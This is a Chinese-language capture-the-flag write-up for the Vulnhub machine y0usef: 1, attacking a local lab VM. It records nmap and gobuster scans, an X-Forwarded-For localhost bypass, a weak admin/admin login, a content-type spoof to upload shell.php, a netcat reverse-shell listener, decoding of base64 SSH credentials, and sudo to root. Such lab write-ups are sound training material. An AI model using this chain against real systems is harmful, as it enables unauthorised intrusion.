Vulnhub之Y0usef靶機詳細測試過程
阿新 • • 發佈:2022-12-07
Y0usef
作者: jason_huawen
靶機基本資訊
名稱:y0usef: 1
地址:
https://www.vulnhub.com/entry/y0usef-1,624/
識別目標主機IP地址
(kali㉿kali)-[~/Vulnhub/Y0urself] └─$ sudo netdiscover -i eth1 Currently scanning: 192.168.62.0/16 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor 192.168.56.100 08:00:27:66:82:69 1 60 PCS Systemtechnik GmbH 192.168.56.247 08:00:27:ca:39:d0 1 60 PCS Systemtechnik GmbH
利用Kali Linux自帶的netdiscover工具識別目標主機的IP地址為192.168.56.247
NMAP掃描
┌──(kali㉿kali)-[~/Vulnhub/Y0urself] └─$ sudo nmap -sS -sV -sC -p- 192.168.56.247 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-06 21:36 EST Nmap scan report for localhost (192.168.56.247) Host is up (0.00018s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d8:e0:99:8c:76:f1:86:a3:ce:09:c8:19:a4:1d:c7:e1 (DSA) | 2048 82:b0:20:bc:04:ea:3f:c2:cf:73:c3:d4:fa:b5:4b:47 (RSA) | 256 03:4d:b0:70:4d:cf:5a:4a:87:c3:a5:ee:84:cc:aa:cc (ECDSA) |_ 256 64:cd:d0:af:6e:0d:20:13:01:96:3b:8d:16:3a:d6:1b (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.10 (Ubuntu) MAC Address: 08:00:27:CA:39:D0 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds
NMAP掃描結果表明目標主機有2個開放埠:22(SSH)、80(HTTP)
獲得Shell
┌──(kali㉿kali)-[~/Vulnhub/Y0urself] └─$ curl http://192.168.56.247 <html> <head> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" integrity="sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2" crossorigin="anonymous"> <body> <div class="container-fluid"> <center class="mt-5"> <h1>Sorry , the site is under construction soon, it run </h1> </center> </div> </body> <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ho+j7jyWK8fNQe+A12Hb8AhRq26LrZ/JpcUGGOn+Y7RsweNrtN/tE3MoK7ZeZDyx" crossorigin="anonymous"></script> </head> </html> ┌──(kali㉿kali)-[~/Vulnhub/Y0urself] └─$ curl http://192.168.56.247/robots.txt <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /robots.txt was not found on this server.</p> <hr> <address>Apache/2.4.10 (Ubuntu) Server at 192.168.56.247 Port 80</address> </body></html>
利用瀏覽器訪問80埠,返回apache2預設頁面,不存在robots.txt檔案,接下來做一下目錄掃描:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ nikto -h http://192.168.56.247
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.247
+ Target Hostname: 192.168.56.247
+ Target Port: 80
+ Start Time: 2022-12-06 21:40:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2022-12-06 21:41:29 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:39:13 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 302]
Progress: 218995 / 220561 (99.29%)===============================================================
2022/12/06 21:39:36 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2022/12/06 21:39:47 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/index.php (Status: 200) [Size: 791]
/.html (Status: 403) [Size: 294]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/server-status (Status: 403) [Size: 302]
Progress: 1102787 / 1102805 (100.00%)===============================================================
2022/12/06 21:41:55 Finished
===============================================================
到目前為止沒有掃描出任何目錄或者檔案,可能是由於常規的掃描把一些狀態碼過濾掉了,而這些目錄可能往往意味著需要認證,因此需要對gobuster工具指定返回狀態碼,以獲得更多的資訊:
200 (成功) 伺服器已成功處理了請求。通常,這表示伺服器提供了請求的網頁。
204 (無內容) 伺服器成功處理了請求,但沒有返回任何內容。
301 (永久移動) 請求的網頁已永久移動到新位置。伺服器返回此響應(對 GET 或 HEAD 請求的響應)時,會自動將請求者轉到新位置。
302 (臨時移動) 伺服器目前從不同位置的網頁響應請求,但請求者應繼續使用原有位置來進行以後的請求。
307 (臨時重定向) 伺服器目前從不同位置的網頁響應請求,但請求者應繼續使用原有位置來進行以後的請求。
401 (未授權)請求要求身份驗證。對於需要登入的網頁,伺服器可能返回此響應。
──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401
Error: error on parsing arguments: status-codes ("200,204,301,302,307,401") and status-codes-blacklist ("404") are both set - please set only one. status-codes-blacklist is set by default so you might want to disable it by supplying an empty string.
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 302,307,401,200,204,301
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:50:43 Starting gobuster in directory enumeration mode
===============================================================
Progress: 219246 / 220561 (99.40%)===============================================================
2022/12/06 21:51:09 Finished
===============================================================
還是沒有掃描出任何目錄,需要更換字典:
──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes: 200,204,301,302,307,401
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:52:00 Starting gobuster in directory enumeration mode
===============================================================
/. (Status: 200) [Size: 791]
/adminstration (Status: 301) [Size: 324] [--> http://192.168.56.247/adminstration/]
Progress: 118867 / 119601 (99.39%)===============================================================
2022/12/06 21:52:14 Finished
===============================================================
這次成功掃描出/administration目錄,訪問該目錄,但是forbidden,這也證實了之前的猜測,繼續掃描下級目錄:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ gobuster dir -u http://192.168.56.247/adminstration/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -s 200,204,301,302,307,401 --status-codes-blacklist ''
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247/adminstration/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
[+] Status codes: 204,301,302,307,401,200
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/06 21:56:02 Starting gobuster in directory enumeration mode
===============================================================
/include (Status: 301) [Size: 332] [--> http://192.168.56.247/adminstration/include/]
/logout (Status: 301) [Size: 331] [--> http://192.168.56.247/adminstration/logout/]
/upload (Status: 301) [Size: 331] [--> http://192.168.56.247/adminstration/upload/]
/users (Status: 301) [Size: 330] [--> http://192.168.56.247/adminstration/users/]
/bootstrap (Status: 301) [Size: 334] [--> http://192.168.56.247/adminstration/bootstrap/]
但是訪問這些目錄,此時沒有報錯或者禁止訪問,但是沒有內容,嘗試新增指向本地的X-Forwarded-For header頭進行bypass,用burpsuite攔截請求,新增X-Forwarded-For: localhost
此時訪問/adminstration,可使用firefox瀏覽器的外掛X-Forwarded-For Header對網頁訪問的過程新增有效的X-Forwarded-For header頭,返回登入頁面。
測試一下弱口令,發現是admin admin
接下來想辦法將shell.php上傳,但是返回file not allowed,需要bypass
發現用burpsuite攔截請求,修改content-type為image/jpg( image/jpeg都不行)
提示上傳成功:file uploadad files/1670382468shell.php
訪問該檔案,獲得shell:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.247] 55915
Linux yousef-VirtualBox 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:08:14 UTC 2014 i686 i686 i686 GNU/Linux
06:11:11 up 37 min, 0 users, load average: 0.00, 0.13, 0.49
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@yousef-VirtualBox:/$ ls
ls
bin cdrom etc initrd.img lost+found mnt proc run srv tmp var
boot dev home lib media opt root sbin sys usr vmlinuz
www-data@yousef-VirtualBox:/$ cd home
cd home
www-data@yousef-VirtualBox:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 root root 4.0K Dec 6 2020 .
drwxr-xr-x 22 root root 4.0K Nov 25 2020 ..
-rw-r--r-- 1 root root 53 Dec 8 2020 user.txt
drwxr-xr-x 18 yousef yousef 4.0K Dec 8 2020 yousef
www-data@yousef-VirtualBox:/home$ cat user.txt
cat user.txt
c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=
www-data@yousef-VirtualBox:/home$
提權
在/home/yousef家目錄中的user.txt,經過了bas64編碼,將其解碼:
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ echo 'c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=' | base64 -d
ssh :
user : yousef
pass : yousef123
得到了使用者yousef的密碼, ssh登入該使用者
┌──(kali㉿kali)-[~/Vulnhub/Y0urself]
└─$ ssh [email protected]
The authenticity of host '192.168.56.247 (192.168.56.247)' can't be established.
ED25519 key fingerprint is SHA256:J3OrMiuy5X+zdlTAYCltBBCNaN3bxTjPbQvtPR6QSzE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.247' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
778 packages can be updated.
482 updates are security updates.
Last login: Tue Dec 8 01:58:33 2020 from s
yousef@yousef-VirtualBox:~$ id
uid=1000(yousef) gid=1000(yousef) groups=1000(yousef),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
yousef@yousef-VirtualBox:~$ sudo -l
[sudo] password for yousef:
Matching Defaults entries for yousef on yousef-VirtualBox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User yousef may run the following commands on yousef-VirtualBox:
(ALL : ALL) ALL
yousef@yousef-VirtualBox:~$ sudo /bin/bash
root@yousef-VirtualBox:~# cd /root
root@yousef-VirtualBox:/root# ls -alh
total 24K
drwx------ 2 root root 4.0K Dec 8 2020 .
drwxr-xr-x 22 root root 4.0K Nov 25 2020 ..
-rw------- 1 root root 235 Dec 8 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw-r--r-- 1 root root 105 Dec 8 2020 root.txt
root@yousef-VirtualBox:/root# cat root.txt
WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx
root@yousef-VirtualBox:/root#
得到了root shell,以及root flag.
經驗教訓
-
第一直接是正確的,因此NMAP掃描出來的結果只有22和80埠,那麼突破口只能是在80埠。
-
常規的目錄掃描如果沒有結果,需要考慮是不是因為狀態碼被過濾掉了,因為某些目錄如需要認證才能訪問,因此需要新增相應的引數,這樣才可能掃描出相應的結果,同時需要考慮更換字典。
-
X-Forwarded-For外掛可以用於修改瀏覽器的該欄位(增加或者修改)
-
在做檔案上傳繞過時,注意觀察正常可以上傳檔案時的各種表現,比如這次修改content-type,需要修改為image/jpg, 而image/jpeg不能正常上傳